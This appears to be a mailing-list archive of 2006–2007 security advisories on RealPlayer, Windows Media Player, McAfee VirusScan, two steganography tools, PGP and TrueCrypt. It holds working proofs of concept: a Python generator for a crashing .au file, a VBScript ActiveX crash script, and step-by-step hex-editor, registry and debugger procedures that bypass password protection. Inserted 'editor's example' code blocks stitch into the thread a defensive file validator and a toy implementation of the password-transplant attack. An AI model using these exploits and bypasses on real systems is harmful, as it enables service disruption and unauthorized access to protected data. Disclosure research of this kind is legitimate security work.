Realplayer 11 DOS attack when processing a malformed AU file on MS Vista and XP

2007-12-01 Thread thesinoda
Type : DoS attack when processing a malformed AU file.

Affected : RealPlayer 11 ActiveX on Windows Vista and Windows XP SP2

Date : 01-12-2007  

Author : Adonis, Abed safehack.com 

Link : http://www.safehack.com/Advisory/realpdos_au.txt



Disclaimer

--

The information in this text is believed to be true based on
experiments, though it may be false.

This material is presented for informational purposes ONLY.

We do not accept any liability for anything anyone does with this

Information.


Brief History

-

Link : http://www.safehack.com/Advisory/realpdos_au.txt

RealPlayer 11 is prone to a denial-of-service vulnerability when

processing a malformed AU file.


A remote attacker can exploit this issue to crash the affected

application, denying service to legitimate users.



The Problem

---

Instructions:

630A87D5   894E 76     MOV DWORD PTR DS:[ESI+76],ECX
630A87D8   1BDB        SBB EBX,EBX
630A87DA   83E3 03     AND EBX,3
630A87DD   83C3 08     ADD EBX,8
630A87E0   0FAFFB      IMUL EDI,EBX
630A87E3   D1E7        SHL EDI,1
630A87E5   33D2        XOR EDX,EDX
630A87E7   F7F7        DIV EDI                  <- division by zero, crash

Registers:

EAX 00000000
ECX 00000000
EDX 00000000
EBX 0000000B
ESP 07F5FE14
EBP 07F5FE24
ESI 01DE0E48
EDI 00000000
EIP 630A87E7 pnen3260.630A87E7



Hex Dump:

00411000  00 00 00 00 9C CF 40 00
00411008  90 D3 40 00 A0 D3 40 00
00411010  C0 D3 40 00 E0 D3 40 00
00411018  00 D4 40 00 10 D4 40 00
00411020  00 00 00 00 00 00 00 00
00411028  00 00 00 00 00 00 00 00



-:P.O.C.:-

+-

#RealPlayer 11 local/remote DoS by A.Sawan aka NtWaK0 and A.Hariri aka nophie

import sys

# Sun .au header: magic, data offset, data size, encoding, sample rate,
# channels (six big-endian uint32 fields), followed by an annotation string
# that is padded with zeros up to the data offset.
magic      = b"\x2E\x73\x6E\x64"   # ".snd"
data_off   = b"\x00\x00\x01\x18"   # 0x118 = 280: sample data starts here
data_size  = b"\x00\x00\x42\xDC"   # claimed data size, far larger than the file
encoding   = b"\x00\x00\x00\x01"   # 1 = 8-bit G.711 mu-law
rate       = b"\x00\x00\x1F\x40"   # 8000 Hz
channels   = b"\x00\x00\x00\x00"   # 0 channels: the field this PoC malforms
annotation = (b"\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x00\x20"   # "iapetus.au\0 "
              b"\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"   # "\"iapetus.au\""
              b"\x00\x31")                                           # "\0" "1"

# zero padding up to the data offset, then four bytes of "sample" data;
# byte for byte the same file as the original generator wrote
head = (magic + data_off + data_size + encoding + rate + channels + annotation
        + b"\x00" * (0x118 - 24 - len(annotation))
        + b"\x66\x66\x66\x00")
assert len(head) == 0x11C

print("[x] RealPlayer 11 DoS by Adonis a.K.a NtWaK0 and Abed aka Nophie.")

try:
    f = open("test.au", "wb")
except IOError as e:
    print("Unable to open file", e)
    sys.exit(0)

print("[x] File successfully opened for writing.")

try:
    f.write(head)
except IOError as e:
    print("Unable to write to file", e)
    sys.exit(0)

print("[x] File successfully written.")
f.close()

print("[x] Open test.au with RealPlayer 11.")




Peace to you all and Happy New Year full of health and Peace



DOS in Realplayer 11 ActiveX on Win Vista and Win XP SP2

2007-11-30 Thread thesinoda
Affected: RealPlayer 11 ActiveX on Windows Vista and Windows XP SP2
Type: DoS attack
Date: 28-11-2007
Author: Adonis, Abed
Link: http://www.safehack.com/Advisory/realpdos.txt

Brief History

GetSourceTransport() fails to handle exceptional conditions, which
leads to a DoS (Denial of Service) attack.

GetSourceTransport() is found in rmoc3260.dll, which is installed
with RealPlayer 11.

Note: This ActiveX control can be loaded by IE or any other browser.

Successful exploitation will lead to a remote crash in IE 6/7.


The Problem

RealPlayer 11 ActiveX DoS Proof-of-Concept

-:PoC:-
1- Copy and paste the following code into filepoc.wsf
2- Run it by double-clicking on it
---snip---










<job id="poc">
<script language="VBScript">
targetFile = "C:\Windows\system32\rmoc3260.dll"
prototype  = "Function GetSourceTransport ( ByVal nSourceNum As Integer ) As String"
memberName = "GetSourceTransport"
progid     = "RealAudioObjects.RealAudio"
argCount   = 1

arg1 = 32767

' The <job>/<script> wrapper and this CreateObject line are restored (they are
' not in the posted copy); they instantiate the control by ProgID before the call.
Set target = CreateObject(progid)
target.GetSourceTransport arg1
</script>
</job>

---snip---


Registers:

EIP 637F4A02
EAX 0022EC44 -> 00000000
EBX 663CCB38 -> 663B7400 -> Uni: t;ft;f
ECX 0022EC44 -> 00000000
EDX 01536388 -> 638416B8
EDI 00000000
ESI 00000000
EBP 0022EC68 -> 0022EC78
ESP 0022EC3C -> 00000000

Block Disassembly:

637F49F2   JE SHORT 637F49F8
637F49F4   MOV ESI,EAX
637F49F6   JMP SHORT 637F49FA
637F49F8   XOR ESI,ESI
637F49FA   LEA ECX,[EBP-24]
637F49FD   CALL 6381C1F0
637F4A02   MOV EDX,[ESI]          <--- CRASH
637F4A04   LEA EAX,[EBP-4]
637F4A07   PUSH EAX
637F4A08   PUSH 638427D8
637F4A0D   PUSH ESI
637F4A0E   CALL [EDX]
637F4A10   MOV EAX,[EBP+8]
637F4A13   SUB EAX,46
637F4A16   JE 637F4B28

Stack Dump:

22EC3C 00 00 00 00 F4 EC 22 00 00 00 00 00 F4 EC 22 07
22EC4C C0 6D 53 01 00 00 00 00 30 ED 22 00 00 00 00 00
22EC5C 00 00 00 00 DC 9A 2B 00 00 00 00 00 78 EC 22 00
22EC6C A8 C7 7F 63 47 00 00 00 FF 7F 00 00 90 EC 22 00
22EC7C 8E 48 3B 66 88 63 53 01 47 00 00 00 FF 7F 00 00


Peace to you all and Happy New Year full of health and Peace


DoS in Microsoft Media Player 11 on Win XP SP2

2007-08-08 Thread thesinoda
Advisory

Affected : Microsoft Windows Media Player 11 on Win XP SP2
Type     : DIVISION by ZERO
Result   : DoS
Remote   : YES
Date     : 2007-08-07
Author   : Adonis, Abed
url      : http://www.safehack.com/exp/mp/mplayer11.txt


Disclaimer

This material is presented for informational and educational
purposes only. We do not accept any liability for anything anyone
does with this information. So, don't shoot the messenger.

Use a computer in ways that ensure respect for your fellows.


Brief History

A division by zero leads to a denial of service on
Microsoft Windows Media Player version 11.

If you open a specially crafted .au file in Windows Media Player
you will crash the player with the following error.

Exception number: c0000094 (divide by zero)

To see if your Windows Media Player is vulnerable you can use our
.au generator coded in python, or you can download the POC file.


Proof-of-Concept

http://www.safehack.com/exp/mp/iapetus.py (python .au generator)
http://www.safehack.com/exp/mp/iapetus.au (poc file)

If you do not have python installed you can just use the poc file.

DEBUG DUMP

Application exception occurred:
App: C:\Program Files\Windows Media Player\wmplayer.exe (pid=4972)
When: 8/7/2007 - 19:50:13.051
Exception number: c0000094 (divide by zero)

*> System Information <*
Computer Name: --
User Name: --
Terminal Session Id: 0
Number of Processors: 1
Processor Type: x86 Family 15 Model 2 Stepping 4
Windows Version: 5.1
Current Build: 2600
Service Pack: 2
Current Type: Uniprocessor Free
Registered Organization: Organization
Registered Owner: Name


*> State Dump for Thread Id 0x838 <*

eax=00000000 ebx=010a82b0 ecx=00000000 edx=00000000 esi=00000000 edi=000fe3a2
eip=748fe598 esp=01c8f0c0 ebp=01c8f154 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246

function: quartz
        748fe581 b708             mov     bh,0x8
        748fe583 c1ea02           shr     edx,0x2
        748fe586 3bd1             cmp     edx,ecx
        748fe588 7702             ja      quartz+0xee58c (748fe58c)
        748fe58a 8bd1             mov     edx,ecx
        748fe58c 0fb708           movzx   ecx,word ptr [eax]
        748fe58f 56               push    esi
        748fe590 8d740aff         lea     esi,[edx+ecx-0x1]
        748fe594 8bc6             mov     eax,esi
        748fe596 33d2             xor     edx,edx
FAULT ->748fe598 f7f1             div     ecx          <- FAULT
        748fe59a 8bc6             mov     eax,esi
        748fe59c 5e               pop     esi
        748fe59d 2bc2             sub     eax,edx
        748fe59f c3               ret
        748fe5a0 90               nop
        748fe5a1 90               nop
        748fe5a2 90               nop
        748fe5a3 90               nop
        748fe5a4 90               nop
        748fe5a5 8bff             mov     edi,edi


The Solution

Wait for a patch from Microsoft.
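
A header checker for the .au file both players above choke on, added here as an
editor's example; it is not the safehack generator and not RealPlayer's or
Windows Media Player's code. The PoC bytes in the RealPlayer post set the
channel-count field to zero, and both faulting instructions (DIV EDI in
pnen3260, div ecx in quartz) divide by a zero that, from the layout of that
file, can only come from the channel field or a block size computed from it;
that link is an inference from the dumps, not something the posts state. The
parser refuses such a header before any frame arithmetic runs, which is the
check a player or a file scanner would want. The encoding table and the 8-byte
annotation padding are this example's assumptions from the Sun .au format.

```python
import struct

AU_MAGIC = b".snd"
AU_HEADER_LEN = 24            # six big-endian uint32 fields
AU_UNKNOWN_SIZE = 0xFFFFFFFF  # "data size not known" per the Sun format

# Bytes per sample for the .au encoding codes this checker accepts
# (1 = 8-bit mu-law, 2/3/4/5 = 8/16/24/32-bit linear PCM, 6/7 = 32/64-bit
# float, 27 = 8-bit A-law). Anything else is rejected rather than guessed.
AU_SAMPLE_BYTES = {1: 1, 2: 1, 3: 2, 4: 3, 5: 4, 6: 4, 7: 8, 27: 1}


class AuError(ValueError):
    """Raised for any header value that must not reach the frame arithmetic."""


def build_au(channels, encoding, rate, payload, annotation=b""):
    """Build a .au file (constructed test input, not a real recording).

    The annotation is NUL-terminated and padded to a multiple of 8 bytes
    (this example's convention); the data offset is computed from it.
    """
    ann = annotation + b"\x00"
    ann += b"\x00" * (-len(ann) % 8)
    offset = AU_HEADER_LEN + len(ann)
    hdr = struct.pack(">4s5I", AU_MAGIC, offset, len(payload), encoding, rate, channels)
    return hdr + ann + payload


def parse_au(data):
    """Validate the .au header and return its fields.

    Every field that later feeds a multiply or divide is range-checked here,
    so a zero channel count (what the PoC file carries) is refused instead of
    becoming a zero divisor.
    """
    if len(data) < AU_HEADER_LEN:
        raise AuError("file shorter than the 24-byte header")
    magic, offset, size, enc, rate, chans = struct.unpack(">4s5I", data[:AU_HEADER_LEN])
    if magic != AU_MAGIC:
        raise AuError("bad magic %r" % magic)
    if offset < AU_HEADER_LEN or offset > len(data):
        raise AuError("data offset 0x%x outside the file" % offset)
    if enc not in AU_SAMPLE_BYTES:
        raise AuError("unsupported encoding %d" % enc)
    if rate == 0:
        raise AuError("zero sample rate")
    if chans == 0:
        raise AuError("zero channels")
    available = len(data) - offset
    if size == AU_UNKNOWN_SIZE or size > available:
        size = available  # trust the bytes present, not the declared size
    annotation = data[AU_HEADER_LEN:offset].split(b"\x00", 1)[0]
    return {"offset": offset, "size": size, "encoding": enc,
            "rate": rate, "channels": chans, "annotation": annotation}


def frame_count(hdr):
    """Sample frames in the data block; the divisor is a product of two
    validated non-zero values, so this cannot fault the way the players do."""
    frame_bytes = AU_SAMPLE_BYTES[hdr["encoding"]] * hdr["channels"]
    return hdr["size"] // frame_bytes


# The 284-byte PoC file from the RealPlayer post, rebuilt field by field:
# channels = 0 and a declared size (0x42DC) far beyond the 4 bytes present.
POC_ANNOTATION = b'iapetus.au\x00 "iapetus.au"\x00' + b"1"
POC_FILE = (struct.pack(">4s5I", AU_MAGIC, 0x118, 0x42DC, 1, 8000, 0)
            + POC_ANNOTATION
            + b"\x00" * (0x118 - AU_HEADER_LEN - len(POC_ANNOTATION))
            + b"fff\x00")


def check_au(data):
    """Return (ok, message) for a candidate file, the shape a scanner would use."""
    try:
        hdr = parse_au(data)
    except AuError as e:
        return False, str(e)
    return True, "%d frames, %d ch, %d Hz" % (frame_count(hdr), hdr["channels"], hdr["rate"])


if __name__ == "__main__":
    print("PoC file :", check_au(POC_FILE))
    repaired = build_au(1, 1, 8000, b"fff\x00", b"iapetus.au")
    print("repaired :", check_au(repaired))
```

Run as a script it reports the PoC file as refused for its zero channel count
and a one-channel rebuild of the same data as four mu-law frames.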

Bypassing Mcafee Entreprise Password Protection

2007-03-17 Thread thesinoda
Date : 03/16/2007

URL: 
http://homepage.mac.com/adonismac/Advisory/bypass_mcafee_entreprise_password.html

 
Affected Product / OS
=====================
Product Name and Version: McAfee VirusScan Enterprise 8.5.0i, maybe older
versions too.

Tested on OS: Windows XP, 2003

Bug Type
========
Type: Bad Design

Bug Results
===========
Bypass Password Protection

Bug Description
===============
McAfee VirusScan Enterprise allows you to lock the user interface using a
password. This requires only a user with write access to the Windows registry.

The password is saved in the UIP value under the key
HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection

Or it can be under

HKEY_LOCAL_MACHINE\SOFTWARE\Network Associates\TVD\VirusScan Enterprise\CurrentVersion


If you remove the value of UIP you will end up bypassing the password.


You can replace the value if you wish with a known value, but why bother
when you can remove the password.
I think this type of protection is not too secure.


Proof-Of-Concept

http://homepage.mac.com/adonismac/Advisory/crack_mcafee_password_protection.html


Peace to you all


A Major design Bug in Camouflage 1.2.1 (latest)

2007-01-10 Thread thesinoda
Direct Link: http://homepage.mac.com/adonismac/Advisory/steg/camouflage.html

Disclaimer
==
This material is presented for informational purposes ONLY. I do not condone or 
encourage vandalism or theft.

I do not accept any liability for anything anyone does with this information. 
So, don't shoot the messenger.
Remember: Use a computer in ways that ensure respect for your fellows.


Author
==
Adonis a.K.a. NtWaK0
Abed a.K.a. NoPh0BiA

 
Affected Product

Camouflage 1.2.1 (latest).
http://camouflage.unfiction.com/


Bug Type and Date
=
Type: Very Bad Design
Date: 01/07/2007


Bug Results
===
Cracking encrypted (Camouflage 1.2.1) files without any bruteforce.

WHY LOSE TIME ON MATH AND BRUTEFORCE WHEN YOU CAN PLAY WITH YOUR HEX EDITOR
:-).


Bug Description
===============
Firstly, computer forensic investigators can take advantage of this bug to
access files protected with Camouflage 1.2.1 without the knowledge of the
original password. Now it is time to check your cold cases for steganography
files.

You can crack Camouflage 1.2.1 encrypted files very easily, in fact in less
than two minutes. The problem is similar to the bug I found in PGP last year.


Camouflage 1.2.1 leaves a footprint after you steg a file.
If you look at the end of your stegged file you will notice the following:
http://homepage.mac.com/adonismac/Advisory/steg/camouf3.jpg

So now we have identified the stegged file; our next step is to access the
HIDDEN messages or files without cracking the password. Here is how.


Proof-of-Concept (THIS WILL WORK ON HIDDEN FILES)
=================================================
For screen capture please check
http://homepage.mac.com/adonismac/Advisory/steg/camouflage.html

Step 01

   1. We use a cover file (carrier file) called "Adonis_Carrier_File1.jpg"
   2. We will hide inside it a file called "Adonis_Hidden_File1.txt"
   3. We will right click "Adonis_Hidden_File1.txt" and select Camouflage
   4. We will use a password ""
   5. We generate the stegged file; we will call it
"Adonis_Camouflage_Stagged_File.jpg"

http://homepage.mac.com/adonismac/Advisory/steg/camouf1.jpg


Step 02

NOTE: We will use a different carrier and a different input file to show you it
will work even if you have a different input and different carriers.

To access the hidden file WITHOUT the original password "" we will do the
following:

   1. We use a cover file (carrier file) called "Adonis_Carrier_File2.jpg"
   2. We will hide inside it a file called "Adonis_Hidden_File2.txt"
   3. We will right click "Adonis_Hidden_File2.txt" and select Camouflage
   4. We will use a password "a"
   5. We generate the stegged file; we will call it
"Adonis_break_camouflage.jpg"
   6. We will open both pictures in a hex editor
   7. We will replace, as indicated in the screen capture below, the bytes in
"Adonis_Camouflage_Stagged_File.jpg" with the ones from
"Adonis_break_camouflage.jpg"
   8. We will save the file.
   9. We will right click "Adonis_Camouflage_Stagged_File.jpg" and select
Camouflage and use "a" as password. YES, we overwrite the password with
something we know.

Simple hein !!!


Now time to break Camouflage.
=============================
We will open "Adonis_Camouflage_Stagged_File.jpg" and
"Adonis_break_camouflage.jpg" in a hex editor. We will start from the END of the
file and try to locate 00 02 63 (about 10 lines from the end of the file).

Once we have located the values we start REPLACING from LEFT to right, starting
after 00 20 63 (63 is the first letter of the password a) (Do not replace 63; it
is your password = a).

In this example I will replace the password  with a. So I will replace F4
1B 43 with 20 20 20.

http://homepage.mac.com/adonismac/Advisory/steg/camouf2.jpg

To summarize, the password is saved starting from 00 00 20 00 (ANYTHING AFTER THIS
POINT IS THE PASSWORD AND THIS CAN BE OVERWRITTEN AS YOU SEE)

 
Testing the results
===
http://homepage.mac.com/adonismac/Advisory/steg/camouflage.html
 

Peace to you all
 
 
Copyright © 2007 Adonis a.K.a NtWaK0


A Major design Bug in Steganography 1.7.x, 1.8 (latest) (Updated Version)

2007-01-10 Thread thesinoda
Direct Link 
http://homepage.mac.com/adonismac/Advisory/steg/steganography.html

Disclaimer
==
This material is presented for informational purposes ONLY. I do not condone or 
encourage vandalism or theft.
I do not accept any liability for anything anyone does with this information. 
So, don't shoot the messenger.

Remember: Use a computer in ways that ensure respect for your fellows.

 
Author
==
Adonis a.K.a. NtWaK0
Abed a.K.a. NoPh0BiA

Affected Product

Steganography 1.7.1 and 1.8 (latest).
http://www.securekit.com/hidefiles.htm

Bug Type and Date
=
Type: Very Bad Design
Date: 01/07/2007


Bug Results
===
Cracking encrypted (steganography application 1.7.x, 1.8) files without any
bruteforce.

WHY LOSE TIME ON MATH AND BRUTEFORCE WHEN YOU CAN PLAY WITH YOUR HEX EDITOR
:-).


Bug Description
===============
Firstly, computer forensic investigators can take advantage of this bug to
access files protected with the steganography application (1.7.x, 1.8) without
the knowledge of the original password. Now it is time to check your cold cases
for steganography files.

You can crack (steganography application 1.7.x, 1.8) encrypted files very
easily, in fact in less than two minutes. The problem is similar to the bug I
found in PGP last year.

(steganography application 1.7.x, 1.8) leaves a footprint after you steg a file.
If you look at the end of your stegged file you will notice it will end with 30
00 0X FF FF. So a simple HEX search will reveal all stegged files.

So now we have identified the stegged file; our next step is to access the
HIDDEN messages or files without cracking the password. Here is how.


Proof-of-Concept (THIS WILL WORK ON HIDDEN MESSAGES and HIDDEN FILES)
=====================================================================
For screen capture please check
http://homepage.mac.com/adonismac/Advisory/steg/steganography.html

Step 01
   1. We use a cover file (carrier file) called "picture_original.jpg"
   2. We will hide inside it a message "Hello Adonis"
   3. We will use a password "aa"
   4. We generate the stegged file; we will call it "picture_with_hidden_msg.jpg"

Step 02

To access the hidden message WITHOUT the original password "aa" we will do
the following:
   1. We will use any other picture file, say "mypicture.jpg"
   2. We will hide inside it a message "WHATEVER"
   3. We will use a password "a"
   4. We generate the stegged file; we will call it "mypicture_steg.jpg"
   5. We will open both pictures in a hex editor
   6. We will replace the last 20 bytes of "picture_with_hidden_msg.jpg" with
the ones from "mypicture_steg.jpg"
   7. We will save the picture "picture_with_hidden_msg.jpg"
   8. We will open "picture_with_hidden_msg.jpg" with (steganography
application 1.7.x, 1.8) using "a" as password. YES, we overwrite the password
with something we know.


Simple hein !!!






Peace to you all
 
Copyright © 2007 Adonis a.K.a NtWaK0


Cracking Steganography Application in less than ONE minute

2007-01-08 Thread thesinoda
Good day

Direct Link to Advisory
http://homepage.mac.com/adonismac/Advisory/steg/steganography.html

Affected Product

Steganography 1.7.1 and 1.8 (latest). http://www.securekit.com/hidefiles.htm


Bug Type and Date
=
Type: Bad Design
Date: 01/06/2007

Bug Results
===
Cracking encrypted steganography files without any bruteforce.

Bug Description
===============
You can crack Steganography encrypted files very easily, in fact in less than
one minute. The problem is similar to the bug I found in PGP last year.


First you have to identify the stegged files. The Steganography application
leaves a footprint after you steg a file.

If you look at the end of your stegged file you will notice it will end with 30
00 02 FF FF. So a simple HEX search will reveal all stegged files.

So now we have identified the stegged file, the next step is to access the
HIDDEN message without cracking the password. Here is how
 

Proof-of-Concept


Step 01

1- We use a file cover (carrier file) called "picture_original.jpg"

2- We will hide inside it a message "Hello Adonis"

3- We will use a password "aa"

4- We generated the steged file we will call it "picture_with_hidden_msg.jpg"
 

Step02
==
To access the hidden message WITHOUT the original password "aa" we will do 
the followings:

1- We will use any other picture file say "mypicture.jpg"

2- We will hide inside it a message "WHATEVER"

3- We will use a password "a"

4- We generate the steged file we will call it "mypicture_steg.jpg"

5- We will open Both pictures in a hex editor

6- We will replace the last 20 bytes of "picture_with_hidden_msg.jpg" with the
ones from "mypicture_steg.jpg"

7- Save picture "picture_with_hidden_msg.jpg"

8- Open it using "a" as password. YES, we overwrite the password with something
we know.


Simple hein !!!


Peace
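
The procedure the three steganography posts above share (find the footprint at
the end of the file, make a file of your own with a password you know, overwrite
the tail of the target with yours) as an added editor's example; it is not the
authors' tool and it does not implement either product's real container format.
The toy format below stores a fixed-length, XOR-obfuscated password in a trailer
and derives nothing from that password, which is the design the posts exploit.
The XOR key, the 16-byte password field and the trailer layout are this
example's assumptions; only the 30 00 02 FF FF marker comes from the posts. The
transplant copies the password-plus-marker region and keeps the target's own
length field, so it works across different carriers and payloads, as the posts
say it does.

```python
import struct

# Trailer signature the posts report for files made with Steganography 1.7.x/1.8;
# used here only for the "simple HEX search" step.
STEG_MARKER = b"\x30\x00\x02\xff\xff"

# --- toy container modelling the flaw (assumed layout, NOT either tool's) ---
#   carrier || payload || payload_len(4, big-endian)
#           || password(16 bytes, each XOR 0x20, NUL-padded) || STEG_MARKER
# Nothing about the payload depends on the password; it is only compared at
# open time, which is what makes overwriting it with a known one sufficient.
XOR_KEY = 0x20                           # obfuscation byte, an assumption of the toy
PW_FIELD = 16
TRAILER_LEN = 4 + PW_FIELD + len(STEG_MARKER)
TAIL_LEN = PW_FIELD + len(STEG_MARKER)   # the region worth transplanting


def obfuscate(password):
    return bytes(b ^ XOR_KEY for b in password)


def toy_hide(carrier, payload, password):
    """Hide payload inside carrier under password (toy format)."""
    if len(password) > PW_FIELD:
        raise ValueError("password too long for the toy field")
    pw = obfuscate(password).ljust(PW_FIELD, b"\x00")
    return carrier + payload + struct.pack(">I", len(payload)) + pw + STEG_MARKER


def is_stegged(blob):
    """The footprint check from the posts: does the file end with the marker?"""
    return blob.endswith(STEG_MARKER)


def toy_reveal(blob, password):
    """Return the hidden payload if password matches the stored one, else None."""
    if not is_stegged(blob) or len(blob) < TRAILER_LEN:
        return None
    trailer = blob[-TRAILER_LEN:]
    (n,) = struct.unpack(">I", trailer[:4])
    stored = trailer[4:4 + PW_FIELD]
    if stored != obfuscate(password).ljust(PW_FIELD, b"\x00"):
        return None
    if len(blob) < TRAILER_LEN + n:
        return None
    return blob[-TRAILER_LEN - n:-TRAILER_LEN]


def transplant_tail(victim, donor, n=TAIL_LEN):
    """Steps 5-7 of the posts: overwrite the last n bytes of victim with donor's.

    n defaults to password field + marker, leaving victim's own length field in
    place so the payload offset stays right for a different carrier/payload.
    """
    if len(victim) < n or len(donor) < n:
        raise ValueError("file shorter than the region to transplant")
    return victim[:-n] + donor[-n:]


def break_toy(victim, known=b"a"):
    """Whole attack: build our own stegged file with a password we know, move
    its tail onto the target, then open the target with our password."""
    donor = toy_hide(b"\xff\xd8 some other picture ", b"WHATEVER", known)
    return toy_reveal(transplant_tail(victim, donor), known)


if __name__ == "__main__":
    # constructed inputs: a fake JPEG-ish carrier and the message from the posts
    victim = toy_hide(b"\xff\xd8\xff\xe0JFIF picture_original", b"Hello Adonis", b"aa")
    print("footprint found          :", is_stegged(victim))
    print("open with 'aa'           :", toy_reveal(victim, b"aa"))
    print("open with 'a'            :", toy_reveal(victim, b"a"))
    print("after transplant, 'a'    :", break_toy(victim))
```

The same three functions are what a forensic triage script needs: is_stegged()
over a directory tree to find candidates, then transplant_tail() with a donor
file you produced yourself.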


RE: A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 8.x & 9.x and Truecrypt.

2006-05-27 Thread thesinoda
Firstly, we appreciate the TrueCrypt team's comments but on the other hand we do
not agree on some.


--Adonis Comment--

I do not agree with some of TrueCrypt's comments, especially the quoted text
below.


What if you had created a virtual disk and given that to someone. That someone
uses it as his/her own disk and decides to change the password because they own
the disk now (you gave it to them with the pass). So they did change the
password, but the originator can still access that disk if he/she replaces the
passphrase bytes in the binary file. So I consider this an attack on data
INTEGRITY and data AVAILABILITY since the legitimate user will be denied access
to the disk after replacing the passphrase bytes.


-- End Comment--




"In conclusion, this is not a "security bug", but design/feature. Also,

to exploit the design, the adversary would have to know your password

first (or have your keyfiles). That means, for example, that he would

capture it using a keystroke logger. If that was the case, then all

security would be practically lost on that machine."




Peace


Proof of concept that PGP AUTHENTICATION CAN BE BYPASSED WITHOUT PATCHING

2006-05-27 Thread thesinoda
This is to answer Mr Jon Callas (PGP CTO) and to show him the last
proof-of-concept. If he did not get it, we consider we have done our part to
report a BIG problem in PGP, unless this is some kind of HIDDEN feature.


--Adonis, Abed Comments--

We do not agree with some of PGP comments. 


We do not know why they just see one side of the coin.


What if you had created a virtual disk and given that to someone. That someone
uses it as his/her own disk and decides to change the password because they own
the disk now (you gave it to them with the pass). So they did change the
password, but the originator can still access that disk if he/she replaces the
passphrase bytes in the binary file. So I consider this an attack on data
INTEGRITY and data AVAILABILITY since the legitimate user will be denied access
to the disk after replacing the passphrase bytes.


"why you do not want to see that your password verification can be simply 

bypassed, besides a reputable co. like PGP should at least put anti-debugging 

tweaks, or even encrypt/hide the passphrase location"


To PGP: your authentication can be bypassed, even if you have created two
different .sda files with two different contents. The authentication can be
overwritten and the file can be extracted if you use a debugger; if you do not
use a debugger you will be able to just bypass the authentication but without
extraction. Why don't you see that, Mr. Jon? Instead of bitching and stuff, why
can't you be professional and just explain facts after you do your homework
with a nice debugger? Is that too much to ask? I think we are talking among
humans and adults, no?


We think Mr. Jon (PGP) should play this flash video SLOW REAL SLOW.


http://www.safehack.com/Advisory/pgp/answerjon.html


PGP comments: http://www.securityfocus.com/archive/1/435155 


Quote from Mr Jon comments: "For completeness, I'll note that we are discussing

whether we should add in a warning dialog to the passphrase change on a PGP

Disk, to tell the user that an attacker who has learned an old passphrase, has

an old disk and a hex editor can patch the disk so that it can be opened. On the

one hand, this might be a good thing to do". 


So if Mr Jon does not see the problem, why are they talking about adding a
message box? Why is the passphrase location not hidden? etc. I still see this
as INTEGRITY and AVAILABILITY attacks on PGP. I do not think it is normal
behavior for an encryption application to reveal its passphrase location and I
do not see bypassing the passphrase dialog box as a feature either.


 


Proof of concept that PGP AUTHENTICATION CAN BE BYPASSED WITHOUT EVEN PATCHING
THE BINARY FILE.


This Flash video is dedicated to Mr. Jon Callas (PGP CTO, CSO).

http://www.safehack.com/Advisory/pgp/proof_of_concept_PGP_Authentication_BYPASS.html

http://www.safehack.com/Advisory/pgp/proof_of_concept_PGP_Authentication_BYPASS.html


We had reported that PGP authentication can be bypassed by patching the binary
file. After reading Mr. Jon Callas's NON PROFESSIONAL answer, Abed and I decided
to show him that this is not true. By using a SIMPLE debugger PGP authentication
can be bypassed.


Here is Mr Jon Callas Comments http://www.securityfocus.com/archive/1/435155 

"Summing up, we are disappointed that for whatever reasons, we were not contacted
about this research before it was put on the web and posted on bugtraq. Had we
been contacted, we could discuss this in private rather than have to air the
details of this misunderstanding in a public forum. I am truly sorry for the
sake of the Information Security Institute of Quebec and its staff that this
complex issue has turned into a public brouhaha."


We load the file in the debugger and set the break points; then we start by
hitting F9. We will see the password dialog; we enter ANY password here. When it
stops at 00409797, hit F9 6 times. You see

on 00405D70 |. E8 4FFBFFFF CALL a_sda.004058C4

we hit F9 6 times.

A break point should be set on 00405D70 to see this.


After running the sda in Olly we end up here. We hit F9 a couple of times, then
we change ESI and EDI

ON 00409797 |. F3:A7 REPE CMPS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]


We see the stack values

ECX=00000002 (decimal 2.)

DS:[ESI]=stack [00BBF68C]=DC3F5C82 <-- IF WE ENTER A BAD PASSWORD THESE WON'T BE
THE SAME

ES:[EDI]=stack [00BBFF98]=DC3F5C82 EQUAL... WE JUST MAKE THEM EQUAL THEN
CONTINUE THE QUEST.


AT THIS POINT PGP Authentication is bypassed.


I hope that helps Mr. Jon (PGP) see the problem. Again, Mr Jon, bitching does
not help you fix your products.


-- End Comment--



Peace


A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 8.x & 9.x and Truecrypt.

2006-05-25 Thread thesinoda


Affected Products:


* PGP 8.x, PGP 9.x, maybe older versions too


* TrueCrypt 4.2, maybe older versions too


// Full detail can be found here //

<> http://www.safehack.com/Advisory/pgp/PGPcrack.html

<> http://www.safehack.com/Advisory/truecrypt/truecrypt.html


If you would like to watch the flash video check the following links.

<> pgpdiskvideo.html Tested on version 8.1 and the latest 9.02

   http://www.safehack.com/Advisory/pgp/pgpdiskvideo.html


<> truecrypt.html Tested on the latest version truecrypt-4.2.zip

   http://www.safehack.com/Advisory/truecrypt/truecrypt.html

   Note If you put stuff inside your test file you need to use a 

   debugger to extract the data. If you just follow the video you 

   will see how it is done without a debugger and an empty file.


The How?



I was able to ACCESS PGP encrypted disks whether the disk was encrypted with a
passphrase or a public key. This method will work on both; scary huh :-)


You need the following tools:

--

   1. A Brain

   2. A Hex Editor.

   3. PGP 8.1 Enterprise or Personal. You can use 9.x too. My feeling is this
method will work on older versions too, because it is a design flaw in the PGP
application, not in the PGP algorithm.

   4. A Debugger (OllyDbg). Not needed if you wanna backdoor PGP.

   

During my tests I have found that PGP Virtual Disk and PGP Self Extractable
file (SDA) have a SERIOUS security bug. I would rather say a design bug.


A PGP disk or SDA can be cracked in 3 major steps:


   1. Editing the PGP protected file using a hex editor (patching the passphrase).

   2. Tracing the PGP protected file using a debugger (you need a lot of time
and coding/cracking experience).

   3. Patching the responsible bytes.


I have spent only a couple of days debugging but surely a lot more time is
needed. But once the process is understood it is a question of finding the right
bytes and patching them.


 

Conclusions from 6 days of debugging and testing:

=================================================

* PGP Virtual Disk and PGP SDA have a serious bug. I have tested PGP
8.1 Enterprise. Other versions may be vulnerable too.


* PGP Corporation made the same error in PGP 9.x; you can bypass the
passphrase dialog box the same way.


* PGP Corporation could avoid this type of issue by calculating the HASH
of the encrypted file. They should make it harder to locate the passphrase.


* PGP Virtual Disk first level protection bypass. Passphrase bypass.
(Working 100%)


